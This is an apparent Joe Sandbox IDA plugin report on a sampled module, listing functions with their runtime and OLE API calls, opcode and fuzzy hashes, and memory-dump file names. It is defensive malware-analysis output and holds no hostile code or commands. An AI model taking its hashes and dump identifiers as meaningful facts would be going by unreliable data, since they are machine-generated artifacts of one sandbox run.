Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$_malloc
String ID:
API String ID: 3942750879-0
Opcode ID: 7df1dfad718c8cb20e4a05c30c975bdf6a7a46b132abf16bec4042d4c6e34652
Instruction ID: 78c6c212db38abe1da61bf46a2af9a1ab616848358cb510e9ae8b254fdcaff38
Opcode Fuzzy Hash: 7df1dfad718c8cb20e4a05c30c975bdf6a7a46b132abf16bec4042d4c6e34652
Instruction Fuzzy Hash: 0041F7B15187419FC314CF69C880A8AFBF4FF99714F508A2EE19A87B50D7B1E548CB92

Function 6CF2C410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF2C478
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF2C488
SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6CF2C4B4
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2C512

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Bound$DestroyElement
String ID:
API String ID: 3987547017-0
Opcode ID: 8e8717a453f21b788c8a765a9e3f29c7d656e3824b138a9e9ef364b17df1afa9
Instruction ID: 2259ea51f062dfa37471fa673c343b48442bbc40d7a6d9b79c504c73cb92aa66
Opcode Fuzzy Hash: 8e8717a453f21b788c8a765a9e3f29c7d656e3824b138a9e9ef364b17df1afa9
Instruction Fuzzy Hash: D5413D75A0014AEFDB00DFD8C880EAEBBB8EB49354F11C569F919E7640D734EA45CBA0

Function 6CF2B580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6CF802A0), ref: 6CF2B5D5
VariantInit.OLEAUT32(?), ref: 6CF2B5E2
VariantClear.OLEAUT32(?), ref: 6CF2B685
VariantClear.OLEAUT32(6CF802A0), ref: 6CF2B68B

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: ddddf941421ba3ef69f5dcd97638892b5c64da56d7b398f02ff75259e91b7740
Instruction ID: c1d17ecfe7faa3d3addc06f984e485e34bdf3e55495d673c09f00f18e2282681
Opcode Fuzzy Hash: ddddf941421ba3ef69f5dcd97638892b5c64da56d7b398f02ff75259e91b7740
Instruction Fuzzy Hash: 5941A272A01209DFDB00DFA9C980B9AFBF9FF89314F2485A9E90597350D776E901CB90

Function 6CF788C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6CF788FD
__isleadbyte_l.LIBCMT ref: 6CF78930
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6CF78961
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6CF789CF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: aeec5f2421b9d99d79496370b352d3e1a87633c045737f486e99806e04b2e5ac
Instruction ID: 06f901b81902b2b95af7a8235bc5b07208ec609ed48146114efff2149777a753
Opcode Fuzzy Hash: aeec5f2421b9d99d79496370b352d3e1a87633c045737f486e99806e04b2e5ac
Instruction Fuzzy Hash: EF31D631A05386EFDB20CFA8E884EAE7FB5BF02314F15456BE464AB990D731D940DB61

Function 6CF05A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF05ACB
__CxxThrowException@8.LIBCMT ref: 6CF05AE0
std::exception::exception.LIBCMT ref: 6CF05B18
__CxxThrowException@8.LIBCMT ref: 6CF05B2D

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc
String ID:
API String ID: 3153320871-0
Opcode ID: 2c0a8142d79bd538e926162e66145b929e9f96d2e883dfc2f5b524043f5d4357
Instruction ID: 8db6e5560598dc67eb2dd54efe51aa3a1444777737d6ddea5497f11754f1c764
Opcode Fuzzy Hash: 2c0a8142d79bd538e926162e66145b929e9f96d2e883dfc2f5b524043f5d4357
Instruction Fuzzy Hash: B73184B6914608ABCB04CF95D8419DAB7F8FF44754F00866EE81997B40EB70EA04CBA5

Function 6CF18470 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

InitializeCriticalSection.KERNEL32(00000000,00000000,6CF15D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6CF184EA
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6CF184F0
std::exception::exception.LIBCMT ref: 6CF1853C
__CxxThrowException@8.LIBCMT ref: 6CF18551

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 3005353045-0
Opcode ID: 2171df965f2451df97889653c206cd14d39856d72bdf24eb3e75905cef596c1e
Instruction ID: 06b3ed0deebcb8f8473a35e97ef83537f89f4ff069c7616c575042f0190c80f6
Opcode Fuzzy Hash: 2171df965f2451df97889653c206cd14d39856d72bdf24eb3e75905cef596c1e
Instruction Fuzzy Hash: E2314B71A05704AFCB14CF69C980A9AFBF8FF09314F508A6EE95687B41D770EA44CB90

Function 6CF2DC40 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CF2DCC5

Part of subcall function 6CF69533: std::exception::_Copy_str.LIBCMT ref: 6CF6954E

__CxxThrowException@8.LIBCMT ref: 6CF2DCDA

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF2DD09
__CxxThrowException@8.LIBCMT ref: 6CF2DD1E

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 399550787-0
Opcode ID: b6f503128f84b4d24965ce181220cbeb9977b214c05d943f92a52c60f6b17759
Instruction ID: ba0da1549a176fc0bee1009e5fb403ce64a594004197ec8e6945dc86d5b49887
Opcode Fuzzy Hash: b6f503128f84b4d24965ce181220cbeb9977b214c05d943f92a52c60f6b17759
Instruction Fuzzy Hash: 8E3152B69002099FDB04CF99D841A9EBBF8FF48310F40856DE91997B50EB70EB04CBA1

Function 6CF72645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CF72653

Part of subcall function 6CF69D66: __FF_MSGBANNER.LIBCMT ref: 6CF69D7F
Part of subcall function 6CF69D66: __NMSG_WRITE.LIBCMT ref: 6CF69D86
Part of subcall function 6CF69D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CF69BD4,6CF01290,A64A5C11), ref: 6CF69DAB

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 5bd59d00f94b22d2950ffb8f463a58cf131fda4f96bc3b99c3bbc86e29001409
Instruction ID: 4b258b536c85f299e01e691c21a1c944e9651a0b6ea5c732f9890cd9e4f69176
Opcode Fuzzy Hash: 5bd59d00f94b22d2950ffb8f463a58cf131fda4f96bc3b99c3bbc86e29001409
Instruction Fuzzy Hash: DE11C432945615EBCF312B76BC0879E3BB8AB46369B340227E8449AF41DF32C94087A4

Function 6CF17240 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6CF34410: _malloc.LIBCMT ref: 6CF3446E

SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6CF17287
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CF1729B
_memmove.LIBCMT ref: 6CF172AF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF172B8

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
String ID:
API String ID: 583974297-0
Opcode ID: ff2116f47afe6e689928fd6baa7f99833717075a614607a0624c191357d24375
Instruction ID: 1ea84475cc74fc98279f7f5661f5783afda9d1456adfa2ae233dc88283e58469
Opcode Fuzzy Hash: ff2116f47afe6e689928fd6baa7f99833717075a614607a0624c191357d24375
Instruction Fuzzy Hash: E11163B6A15118BBCB14CF95DC80DDFBB7CDF99654B01826AF90897600EA719A058BE0

Function 6CF25A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF25AB9
VariantCopy.OLEAUT32(?,6CF99C90), ref: 6CF25AC1
VariantClear.OLEAUT32(?), ref: 6CF25AE2
__CxxThrowException@8.LIBCMT ref: 6CF25AEF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ClearCopyException@8InitThrow
String ID:
API String ID: 3826472263-0
Opcode ID: 755c4c543923bdb01027d9369b6ce5feb999e47013f1fbc7049d39cf868e1c19
Instruction ID: 4edd3ddc6bba1e76cfebb13eee8797fce852a3ea999447d901f77f0248aa897e
Opcode Fuzzy Hash: 755c4c543923bdb01027d9369b6ce5feb999e47013f1fbc7049d39cf868e1c19
Instruction Fuzzy Hash: 3B11D372D05668AFCB11DF98C8C4ADFBB78FB46624F11412AE824A3700C7799E048BE0

Function 6CF38D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CF38D8A

Part of subcall function 6CF69D66: __FF_MSGBANNER.LIBCMT ref: 6CF69D7F
Part of subcall function 6CF69D66: __NMSG_WRITE.LIBCMT ref: 6CF69D86
Part of subcall function 6CF69D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CF69BD4,6CF01290,A64A5C11), ref: 6CF69DAB

Part of subcall function 6CF691F6: std::_Lockit::_Lockit.LIBCPMT ref: 6CF69202

_malloc.LIBCMT ref: 6CF38DAF
std::exception::exception.LIBCMT ref: 6CF38DD4
__CxxThrowException@8.LIBCMT ref: 6CF38DEB

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
String ID:
API String ID: 3043633502-0
Opcode ID: 65928a5e4f75ee5584f40ef659abdb83a9f9dfa1733ee03b6e8eaa80a7339be1
Instruction ID: 35e7d3acd7da29f0d6aa1a4705953e54eb852cfd6776d98ebee7df0fe58b1dfd
Opcode Fuzzy Hash: 65928a5e4f75ee5584f40ef659abdb83a9f9dfa1733ee03b6e8eaa80a7339be1
Instruction Fuzzy Hash: 1EF0F0728052256BD201EB569C51BDF37F8DF91618F40082EF95892E00FB25D70C82F3

Function 6CF70A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6CF70A86

Part of subcall function 6CF708B2: __fltout2.LIBCMT ref: 6CF708DD

__cftog_l.LIBCMT ref: 6CF70AAC
__cftoe_l.LIBCMT ref: 6CF70ADE

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 84c0cb4be06a8898d1ed8b93233afff1442e2a590e41d5dab5049d4788934fb6
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 08115B3240018ABBDF265F84EC118DE3F22BF19258F598516FA2859920C377C5B1AB91

Function 6CF68970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6CF68A84
_memmove.LIBCMT ref: 6CF68AA0

Strings

EncodingParameters, xrefs: 6CF68A41

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memmove_memset
String ID: EncodingParameters
API String ID: 3555123492-55378216
Opcode ID: 39c2030f4ddff6591dfb388f365c0f56f7f8d35cb5531b4d4077e6918ab85c4e
Instruction ID: 48828f65607fe982a66e410edeeab637480101d77c3fd8f9d164af43f6f9a4e7
Opcode Fuzzy Hash: 39c2030f4ddff6591dfb388f365c0f56f7f8d35cb5531b4d4077e6918ab85c4e
Instruction Fuzzy Hash: 0561F2B46083419FD304CF69C880A1AFBE9AFC9754F148A1EF59987391D770E945CBA2

Function 6CF0F190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6CF04760: __CxxThrowException@8.LIBCMT ref: 6CF047F9

Part of subcall function 6CF38D80: _malloc.LIBCMT ref: 6CF38D8A
Part of subcall function 6CF38D80: _malloc.LIBCMT ref: 6CF38DAF

_memcpy_s.LIBCMT ref: 6CF0F282
_memset.LIBCMT ref: 6CF0F293

Strings

@, xrefs: 6CF0F2DE

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _malloc$Exception@8Throw_memcpy_s_memset
String ID: @
API String ID: 3081897325-2766056989
Opcode ID: 7933c1355d5feb417062f1e284e7b1492ea3850e522aa7eea825a395942c71dc
Instruction ID: aa01703a5dfae8d3cb9f50bb9c8a4743238072c47c0c39a2b7ff6019f70702f5
Opcode Fuzzy Hash: 7933c1355d5feb417062f1e284e7b1492ea3850e522aa7eea825a395942c71dc
Instruction Fuzzy Hash: 2B51AE71E04248DFDB10CFA4D891BDEBBB4BF55308F108199E84967781DB716A49CFA2

Function 6CF04100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF04175
_memmove.LIBCMT ref: 6CF041C6

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

Strings

string too long, xrefs: 6CF04170

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
